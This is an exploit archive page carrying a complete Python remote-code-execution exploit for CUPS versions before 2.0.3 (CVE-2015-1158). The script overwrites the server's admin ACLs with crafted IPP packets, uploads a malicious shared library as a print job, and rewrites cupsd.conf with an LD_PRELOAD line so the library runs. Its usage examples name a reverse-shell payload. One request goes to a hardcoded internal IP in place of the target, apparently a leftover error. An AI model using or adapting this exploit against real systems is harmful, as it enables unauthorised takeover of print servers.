what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CUPS Remote Code Execution

CUPS Remote Code Execution
Posted Feb 3, 2017
Authored by 0x00string

CUPS versions prior to 2.0.3 reference count over decrement remote code execution exploit.

tags | exploit, remote, code execution
advisories | CVE-2015-1158
SHA-256 | 9952774461bb22bab55621db41a0c77cb15b0319086b5d190546e343fd847c8f

CUPS Remote Code Execution

Change Mirror Download
#!/usr/bin/python
# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution
# Google Dork: n/a
# Date: 2/2/17
# Exploit Author: @0x00string
# Vendor Homepage: cups.org
# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2
# Version: <2.0.3
# Tested on: Ubuntu 14/15
# CVE : CVE-2015-1158
import os, re, socket, random, time, getopt, sys
from socket import *
from struct import *

def banner():
print '''
lol ty google
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
github.com/0x00string/oldays/CVE-2015-1158.py
'''

def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target IPP service port\n"
" -c, --lib /path/to/payload.so\n"
" -f, --stomp-only Only stomp the ACL (no postex)\n"
"\n"
"Examples:\n"
"python script.py -a 10.10.10.10 -b 631 -f\n"
"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\n")
exit()

def pretty (t, m):
if (t is "+"):
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
elif (t is "-"):
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
elif (t is "*"):
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
elif (t is "!"):
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",

def createDump (input):
d, b, h = '', [], []
u = list(input)
for e in u:
h.append(e.encode("hex"))
if e == '0x0':
b.append('0')
elif 30 > ord(e) or ord(e) > 128:
b.append('.')
elif 30 < ord(e) or ord(e) < 128:
b.append(e)

i = 0
while i < len(h):
if (len(h) - i ) >= 16:
d += ' '.join(h[i:i+16])
d += " "
d += ' '.join(b[i:i+16])
d += "\n"
i = i + 16
else:
d += ' '.join(h[i:(len(h) - 0 )])
pad = len(' '.join(h[i:(len(h) - 0 )]))
d += ' ' * (56 - pad)
d += ' '.join(b[i:(len(h) - 0 )])
d += "\n"
i = i + len(h)

return d

class tcpsock:
def __init__(self, sock=None):
if sock is None:
self.sock = socket(
AF_INET, SOCK_STREAM)
self.sock.settimeout(30)
else:
self.sock = sock
def connect(self, host, port):
self.sock.connect((host, int(port)))
def tx(self, msg):
self.sock.send(msg)
def rx(self):
tmp = self.sock.recv(1024)
msg = ""
while tmp:
msg += tmp
tmp = self.sock.recv(1024)
return msg

def txrx (ip, port, proto, txpacket):
if (proto is "tcp"):
sock = tcpsock()
elif (proto is "udp"):
sock = udpsock()
else:
return None
sock.connect(ip, port)
sock.tx(txpacket)
rxpacket = sock.rx()
return rxpacket

def locatePrinters(rhost, rport="631"):
request = ( "GET /printers HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
response = txrx(rhost, int(rport), "tcp", request)
if response is not None:
m = re.search('<TR><TD><A HREF="(.+)">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)
if m is not None:
printer = m.group(1)
pretty("+","printer found: " + printer)
else:
pretty("-","no printers")
exit(1)
return printer

def preparePayload(libpath):
with open(libpath, 'rb') as f:
payload = f.read()
if payload is not None:
pretty("*","Payload:\n" + createDump(payload))
else:
pretty("-","something went wrong")
usage()
return payload

def seedTarget(rhost, rport, printer, payload):
i = random.randint(1,3)
reqid = str(pack(">i",(i+2)))
reqid2 = str(pack(">i",(i+3)))
printer_uri = "ipp://" + rhost + ":" + str(rport) + printer

create_job_packet = ("\x02\x00"
"\x00\x05"+
reqid+
"\x01"
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
"\x42"+"\x00\x08"+"job-name"+"\x00\x06"+"badlib"
"\x02"
"\x21"+"\x00\x06"+"copies"+"\x00\x04"+"\x00\x00\x00\x01"
"\x23"+"\x00\x0a"+"finishings"+"\x00\x04"+"\x00\x00\x00\x03"
"\x42"+"\x00\x10"+"job-cancel-after"+"\x00\x05"+"\x31\x30\x38\x30\x30"
"\x44"+"\x00\x0e"+"job-hold-until"+"\x00\x0a"+"indefinite"
"\x21"+"\x00\x0c"+"job-priority"+"\x00\x04"+"\x00\x00\x00\x32"
"\x42"+"\x00\x0a"+"job-sheets"+"\x00\x04"+"none"+"\x42"+"\x00\x00\x00\x04"+"none"
"\x21"+"\x00\x09"+"number-up"+"\x00\x04"+"\x00\x00\x00\x01"
"\x03")
pretty("*","Sending createJob")

http_header1 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(create_job_packet) + 0) + "\x0d\x0a"
"\x0d\x0a")

createJobRequest = http_header1 + create_job_packet
blah = txrx(rhost,int(rport),"tcp",createJobRequest)
if blah is not None:
m = re.search("ipp://" + rhost + ":" + str(rport) + "/jobs/(\d+)",blah)
if m is not None:
jobid = m.group(1)
else:
pretty("-","something went wrong");
exit()

pretty("*","\n" + createDump(blah) + "\n")
pretty("*", "Sending sendJob")

send_document_packet = ("\x02\x00"
"\x00\x06"+
reqid2+
"\x01"
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
"\x21"+"\x00\x06"+"job-id"+"\x00\x04"+ str(pack(">i", int(jobid))) +
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
"\x42"+"\x00\x0d"+"document-name"+"\x00\x06"+"badlib"
"\x49"+"\x00\x0f"+"document-format"+"\x00\x18"+"application/octet-stream"
"\x22"+"\x00\x0d"+"last-document"+"\x00\x01"+"\x01"
"\x03"+
payload)

http_header2 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(send_document_packet) + 0) + "\x0d\x0a"
"\x0d\x0a")

sendJobRequest = http_header2 + send_document_packet
blah2 = txrx("172.20.32.3",631,"tcp",sendJobRequest)
pretty("*","\n" + createDump(blah) + "\n")
pretty("*","job id: " + jobid)
return jobid

def stompACL(rhost, rport, printer):
i = random.randint(1,1024)
printer_url = "ipp://" + rhost + ":" + rport + printer

admin_stomp = ("\x02\x00" # vers 2.0
"\x00\x05"+ # op id: Create Job (0x0005)
str(pack(">i",(i+1)))+
"\x01" # op attributes marker
"\x47" # charset
"\x00\x12" # name len: 18
"attributes-charset"
"\x00\x08" # val len: 8
"us-ascii"
"\x48" # natural language
"\x00\x1b" # name len: 27
"attributes-natural-language"
"\x00\x06" # val len: 6
"/admin"
"\x45" # printer-uri
"\x00\x0b" # name len 11
"printer-uri" +
str(pack(">h", len(printer_url))) + printer_url +
"\x42" # name without lang
"\x00\x14" # name len: 20
"requesting-user-name"
"\x00\x06" # val len: 6
"/admin"
"\x02" # job attrs marker
"\x21" # integer
"\x00\x06" # name len: 6
"copies"
"\x00\x04" # val len: 4
"\x00\x00\x00\x01" # 1
"\x42" # name w/o lang
"\x00\x19" # name len: 25
"job-originating-host-name"
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x36" # nwl
"\x00\x00" # name len: 0
"\x00\x16" # val len: 22
"\x00\x06" # length
"/admin"
"\x00\x0c"
"BBBBBBBBBBBB"
"\x03") # end of attributes

conf_stomp = ("\x02\x00" # vers 2.0
"\x00\x05"+ # op id: Create Job (0x0005)
str(pack(">i",(i+2)))+
"\x01" # op attributes marker
"\x47" # charset
"\x00\x12" # name len: 18
"attributes-charset"
"\x00\x08" # val len: 8
"us-ascii"
"\x48" # natural language
"\x00\x1b" # name len: 27
"attributes-natural-language"
"\x00\x0b" # val len: 11
"/admin/conf"
"\x45" # printer-uri
"\x00\x0b" # name len 11
"printer-uri" +
str(pack(">h", len(printer_url))) + printer_url +
"\x42" # name without lang
"\x00\x14" # name len: 20
"requesting-user-name"
"\x00\x0b" # val len: 11
"/admin/conf"
"\x02" # job attrs marker
"\x21" # integer
"\x00\x06" # name len: 6
"copies"
"\x00\x04" # val len: 4
"\x00\x00\x00\x01" # 1
"\x42" # name w/o lang
"\x00\x19" # name len: 25
"job-originating-host-name"
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x36" # nwl
"\x00\x00" # name len: 0
"\x00\x1b" # val len: 27
"\x00\x0b" # length
"/admin/conf"
"\x00\x0c"
"BBBBBBBBBBBB"
"\x03") # end of attributes

http_header1 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(admin_stomp)) + "\x0d\x0a"
"\x0d\x0a")

http_header2 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(conf_stomp)) + "\x0d\x0a"
"\x0d\x0a")

pretty("*","stomping ACL")
pretty("*",">:\n" + createDump(http_header1 + admin_stomp))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header1 + admin_stomp)))
time.sleep(1)
pretty("*",">:\n" + createDump(http_header2 + conf_stomp))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header2 + conf_stomp)))

http_header_check = ("GET /admin HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
pretty("*","checking /admin")
pretty("*",">:\n" + createDump(http_header_check))
res = txrx(rhost,rport,"tcp",http_header_check)
pretty("*","<:\n" + createDump(res))
m = re.search('200 OK', res)
if m is not None:
pretty("+","ACL stomp successful")
else:
pretty("-","exploit failed")
exit(1)


def getConfig(rhost, rport):
i = random.randint(1,1024)
original_config = ""
http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")

pretty("*","grabbing configuration file....")
res = txrx(rhost,rport,"tcp",http_request)
res_array = res.split("\x0d\x0a\x0d\x0a")
original_config = res_array[1]
pretty("*","config:\n" + original_config + "\n")
return original_config

def putConfig(rhost, rport, config):
http_request = ("PUT /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Keep-Alive\x0d\x0a"
"Content-Length: " + str(len(config)) + "\x0d\x0a"
"\x0d\x0a")
pretty("*","overwriting config...")
pretty("*",">:\n" + createDump(http_request + config))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))

def poisonConfig(config, name):
config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d00" + name + "-001\x0a"
return config

def main():
rhost = None;
noshell = None;
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
elif opt in ('-c','--lib'):
libpath = arg;
elif opt in ('-f','--stomp-only'):
noshell = 1;
banner()
if rhost is None or rport is None:
usage()
pretty("*","locate available printer")
printer = locatePrinters(rhost, rport)
pretty("*","stomp ACL")
stompACL(rhost, rport, printer)
if (noshell is not None):
pretty("*","fin")
exit(0)
pretty("*","prepare payload")
payload = preparePayload(libpath)
pretty("*","spray payload")
jobid = seedTarget(rhost, rport, printer, payload)
pretty("*","grab original config")
OG_config = getConfig(rhost, rport)
pretty("*","generate poison config")
evil_config = poisonConfig(OG_config, jobid)
pretty("*","upload poison config")
putConfig(rhost, rport, evil_config)
pretty("*","fin")
exit(0);

if __name__ == "__main__":
main()

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close